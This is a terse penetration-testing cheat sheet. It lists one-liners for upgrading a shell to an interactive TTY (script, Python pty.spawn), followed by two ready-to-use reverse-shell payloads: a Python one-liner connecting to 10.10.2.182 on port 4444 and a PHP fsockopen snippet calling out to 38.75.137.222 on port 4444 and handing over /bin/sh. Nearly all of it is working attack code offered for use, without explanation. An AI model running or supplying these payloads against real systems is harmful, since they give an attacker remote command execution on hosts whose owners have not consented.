=== [ normalize ] ===

## with script
script /dev/null -c bash

## normalize shell with rlwrap

## normalize shell with sh

## normalize shell with python < 3
python -c 'import pty;pty.spawn("/bin/bash")'

## normalize shell with python3
python3 -c 'import pty;pty.spawn("/bin/bash")'


=== [ REVERSE SHELL ] ===

export RHOST="10.10.2.182";export RPORT=4444;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
<?php
$sock=fsockopen("38.75.137.222",4444);exec("/bin/sh -i <&3 >&3 2>&3");
?>